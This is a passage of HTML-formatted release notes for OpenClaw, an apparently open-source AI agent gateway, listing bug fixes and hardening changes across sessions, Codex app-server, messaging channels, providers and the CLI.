<li>Gateway/sessions: preserve compatible session auth profile overrides when switching models within the same provider, including provider-auth aliases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4446719061" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81837" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81837/hovercard" href="https://github.com/openclaw/openclaw/issues/81837">#81837</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4448375153" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81886" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81886/hovercard" href="https://github.com/openclaw/openclaw/pull/81886">#81886</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Gateway/status: surface inbound delivery telemetry counters and transport-liveness warnings in <code>openclaw status --all</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093339126" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49577" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49577/hovercard" href="https://github.com/openclaw/openclaw/issues/49577">#49577</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334434847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72724/hovercard" href="https://github.com/openclaw/openclaw/pull/72724">#72724</a>)</li>
<li>Docker: prune package-excluded plugin source workspaces and dependency closures so runtime images do not keep packages for plugins that were not opted in.</li>
<li>Providers/Ollama: treat Docker/OrbStack host aliases as local Ollama endpoints so <code>ollama-local</code> marker auth works when OpenClaw runs inside a VM/container and Ollama runs on the host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492687433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84875" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84875/hovercard" href="https://github.com/openclaw/openclaw/issues/84875">#84875</a>.</li>
<li>QA-Lab: keep explicitly searchable/deferred OpenClaw dynamic tool rows report-only by default so tool-coverage gates do not treat mock discovery gaps as hard product failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416028202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80319/hovercard" href="https://github.com/openclaw/openclaw/issues/80319">#80319</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Agents/config: keep non-Google provider model refs from being rewritten by Google Gemini preview-id normalization. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491152950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84762" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84762/hovercard" href="https://github.com/openclaw/openclaw/pull/84762">#84762</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</li>
<li>Installer: require a real controlling terminal before launching onboarding so headless <code>curl | bash</code> installs finish cleanly after installing the CLI.</li>
<li>Agents/Codex: promote a completed final assistant response when a prompt timeout races Codex app-server completion instead of returning an empty timeout envelope. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4484831985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84516" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84516/hovercard" href="https://github.com/openclaw/openclaw/issues/84516">#84516</a>.</li>
<li>Codex app-server: keep interrupted turn statuses from being treated as OpenClaw aborts by themselves, so tool-only turns remain eligible for no-visible-answer recovery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4484261445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84492" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84492/hovercard" href="https://github.com/openclaw/openclaw/issues/84492">#84492</a>.</li>
<li>Agents: cap heartbeat model bleed context hints by the stored session window when runtime model metadata is unavailable, so overflow recovery advice does not suggest a larger window than the active session actually has.</li>
<li>Control UI/Web Push: use <code>https://openclaw.ai</code> as the generated default VAPID subject instead of the old localhost mailbox so iOS PWA push setup uses an Apple-acceptable subject when <code>OPENCLAW_VAPID_SUBJECT</code> is unset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463833833" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83134" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83134/hovercard" href="https://github.com/openclaw/openclaw/issues/83134">#83134</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465313833" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83317" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83317/hovercard" href="https://github.com/openclaw/openclaw/pull/83317">#83317</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</li>
<li>Control UI: distinguish inherited thinking-off settings from explicit Off selections so the thinking selector no longer shows two identical Off rows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499864598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85223" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85223/hovercard" href="https://github.com/openclaw/openclaw/pull/85223">#85223</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/Pi: keep embedded session transcript writes from tripping false takeover detection after packaged npm onboarding agent turns.</li>
<li>Codex/TUI: surface Codex-native post-turn compaction failures instead of continuing uncompacted, and keep successful native compaction serialized before local idle/next-turn handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4480907550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84305/hovercard" href="https://github.com/openclaw/openclaw/issues/84305">#84305</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499073217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85160/hovercard" href="https://github.com/openclaw/openclaw/pull/85160">#85160</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Memory/search: stop recall tracking from writing dreaming side-effect artifacts when <code>dreaming.enabled=false</code>, while preserving normal search results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483132130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84436" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84436/hovercard" href="https://github.com/openclaw/openclaw/issues/84436">#84436</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483302640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84444" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84444/hovercard" href="https://github.com/openclaw/openclaw/pull/84444">#84444</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Diffs: render viewer toolbar icons from a closed icon-name map instead of HTML strings, removing the toolbar icon XSS sink. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4474146520" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83955" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83955/hovercard" href="https://github.com/openclaw/openclaw/pull/83955">#83955</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tanshanshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tanshanshan">@tanshanshan</a>.</li>
<li>QA: keep <code>pnpm qa:e2e</code> self-check runs inside the private QA runtime envelope even when inherited shell env disables bundled plugins.</li>
<li>fix(config): validate browser sandbox bind sources [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491649611" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84799" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84799/hovercard" href="https://github.com/openclaw/openclaw/pull/84799">#84799</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>doctor: constrain legacy plugin cleanup paths [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491667697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84801" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84801/hovercard" href="https://github.com/openclaw/openclaw/pull/84801">#84801</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Update/doctor: prune stale local bundled plugin install records that point at old compiled bundled output so current bundled plugin schemas win after upgrade. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492494073" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84863/hovercard" href="https://github.com/openclaw/openclaw/pull/84863">#84863</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Providers/Ollama: preserve native Ollama tool-call IDs across assistant replay so Gemini over Ollama Cloud can keep its hidden function-call thought-signature handle.</li>
<li>Discord: keep session recovery and <code>/stop</code> abort ownership on the source dispatch lane while bound ACP turns continue routing to their target session, so stalled pre-run work and late replies are cleared instead of leaking after stop. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483895207" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84477/hovercard" href="https://github.com/openclaw/openclaw/issues/84477">#84477</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497982606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85100/hovercard" href="https://github.com/openclaw/openclaw/pull/85100">#85100</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Discord/voice-call: keep forced realtime voice consult diagnostics in debug logs instead of agent prompts, so callers do not hear OpenClaw policy text when the provider misses <code>openclaw_agent_consult</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4482803751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84411" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84411/hovercard" href="https://github.com/openclaw/openclaw/pull/84411">#84411</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Codex app-server: mark missing turn completion after observed execution as replay-unsafe and release the session so follow-up turns can run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476289375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84076" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84076/hovercard" href="https://github.com/openclaw/openclaw/issues/84076">#84076</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498078569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85107" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85107/hovercard" href="https://github.com/openclaw/openclaw/pull/85107">#85107</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Codex app-server: give visible <code>message</code> dynamic tool sends a longer timeout budget so slow channel delivery can return its own result or error instead of hitting the 30-second Codex wrapper. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499812848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85216/hovercard" href="https://github.com/openclaw/openclaw/pull/85216">#85216</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Codex app-server: add a dedicated post-tool raw assistant completion idle timeout config so trusted heavy turns can wait longer after tool handoff without weakening final assistant release.</li>
<li>Matrix: keep explicitly configured two-person rooms on the room route before stale <code>m.direct</code> or strict two-member DM fallback can bypass mention gating. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496136567" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85017/hovercard" href="https://github.com/openclaw/openclaw/issues/85017">#85017</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498803495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85137" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85137/hovercard" href="https://github.com/openclaw/openclaw/pull/85137">#85137</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/subagents: require explicit subagent allowlist targets to be configured agents so stale deleted-agent ids are omitted from <code>agents_list</code> and rejected by <code>sessions_spawn</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491844371" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84811" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84811/hovercard" href="https://github.com/openclaw/openclaw/issues/84811">#84811</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499010254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85154" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85154/hovercard" href="https://github.com/openclaw/openclaw/pull/85154">#85154</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>PDF tool: time out idle remote PDF body reads after 120 seconds so stalled remote documents return an error instead of wedging the session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288676163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68649" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68649/hovercard" href="https://github.com/openclaw/openclaw/issues/68649">#68649</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491207985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84768" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84768/hovercard" href="https://github.com/openclaw/openclaw/pull/84768">#84768</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>.</li>
<li>Diagnostics/OpenTelemetry plugin: suppress handled OTLP exporter promise rejections so collector shutdowns no longer crash the Gateway. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4430729094" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81085" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81085/hovercard" href="https://github.com/openclaw/openclaw/pull/81085">#81085</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>.</li>
<li>Agents/exec: omit raw command text and env values from denied exec failure logs while keeping safe correlation metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496830927" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85049" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85049/hovercard" href="https://github.com/openclaw/openclaw/issues/85049">#85049</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498838754" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85140" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85140/hovercard" href="https://github.com/openclaw/openclaw/pull/85140">#85140</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Media-understanding: restore the 4096-token default for image descriptions so reasoning-capable vision models no longer truncate before returning text, while preserving smaller model caps. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494048283" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84932" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84932/hovercard" href="https://github.com/openclaw/openclaw/pull/84932">#84932</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scotthuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scotthuang">@scotthuang</a>.</li>
<li>Media/audio: skip empty structured sherpa-onnx transcripts instead of treating the raw JSON payload as spoken text. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488983460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84667" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84667/hovercard" href="https://github.com/openclaw/openclaw/pull/84667">#84667</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
<li>Agents/exec: preserve inherited XDG base-directory environment values for subprocesses while still rejecting agent-supplied XDG overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492278181" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84854" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84854/hovercard" href="https://github.com/openclaw/openclaw/issues/84854">#84854</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4498820649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85139" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85139/hovercard" href="https://github.com/openclaw/openclaw/pull/85139">#85139</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Node/Linux: keep <code>OPENCLAW_GATEWAY_TOKEN</code> out of generated systemd unit files by writing node service token values to a node-specific env file. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4482764578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84408" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84408/hovercard" href="https://github.com/openclaw/openclaw/pull/84408">#84408</a>)</li>
<li>Memory-core/dreaming: reuse stable narrative subagent session keys per workspace and phase while keeping per-run idempotency and bounded cleanup, so stale <code>dreaming-narrative-*</code> sessions do not accumulate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284837574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68252" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68252/hovercard" href="https://github.com/openclaw/openclaw/issues/68252">#68252</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293065762" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69187/hovercard" href="https://github.com/openclaw/openclaw/issues/69187">#69187</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312560097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70402" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70402/hovercard" href="https://github.com/openclaw/openclaw/issues/70402">#70402</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313300565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70464" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70464/hovercard" href="https://github.com/openclaw/openclaw/pull/70464">#70464</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chiyouYCH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chiyouYCH">@chiyouYCH</a>.</li>
<li>Trajectory/support: tolerate partial skill snapshot entries when building support metadata so rejected skill path scans no longer abort trajectory capture. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324624469" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71185" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71185/hovercard" href="https://github.com/openclaw/openclaw/pull/71185">#71185</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lukeboyett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lukeboyett">@lukeboyett</a>.</li>
<li>TUI: coalesce repeated idle Esc abort notices into a single <code>no active run xN</code> system row instead of appending duplicate rows.</li>
<li>Telegram: honor <code>channels.telegram.pollingStallThresholdMs</code> in the default isolated polling path, restarting silent workers instead of leaving inbound updates wedged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4474114528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83950/hovercard" href="https://github.com/openclaw/openclaw/issues/83950">#83950</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492438443" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84861" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84861/hovercard" href="https://github.com/openclaw/openclaw/pull/84861">#84861</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Telegram: dedupe replayed message dispatches by Telegram chat/message identity so isolated-ingress replays do not trigger duplicate model dispatches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4493044796" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84886/hovercard" href="https://github.com/openclaw/openclaw/issues/84886">#84886</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499730658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85208" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85208/hovercard" href="https://github.com/openclaw/openclaw/pull/85208">#85208</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Slack: suppress reasoning payloads before reply delivery and dispatch accounting, so Slack monitor, slash-command, fallback, and direct reply paths do not leak model reasoning. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4481035938" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84319/hovercard" href="https://github.com/openclaw/openclaw/issues/84319">#84319</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4481083191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84322" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84322/hovercard" href="https://github.com/openclaw/openclaw/pull/84322">#84322</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ffluk3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ffluk3">@ffluk3</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Slack: deliver native plugin approval prompts and updates when Slack native approvals are enabled, while keeping plugin approval authorization separate from exec approvers.</li>
<li>Slack: keep native plugin approval prompts in the originating app conversation thread when the live Slack turn source is a <code>D...</code> conversation.</li>
<li>Agents/Pi: disable the embedded pi-coding-agent runtime auto-retry so OpenClaw's own retry and failover loop does not replay failed tool calls through a nested SDK retry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345792398" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73781" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73781/hovercard" href="https://github.com/openclaw/openclaw/issues/73781">#73781</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351648711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74434/hovercard" href="https://github.com/openclaw/openclaw/pull/74434">#74434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yelog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yelog">@yelog</a>.</li>
<li>CLI/perf: keep <code>setup --help</code>, <code>onboard --help</code>, and <code>configure --help</code> out of the full wizard runtime while preserving the existing help output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4484116150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84488" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84488/hovercard" href="https://github.com/openclaw/openclaw/pull/84488">#84488</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
<li>CLI/perf: keep <code>agents --help</code> out of agents action/runtime imports so help, completion, and command discovery paths avoid loading the full agents runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4484034054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84483" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84483/hovercard" href="https://github.com/openclaw/openclaw/pull/84483">#84483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
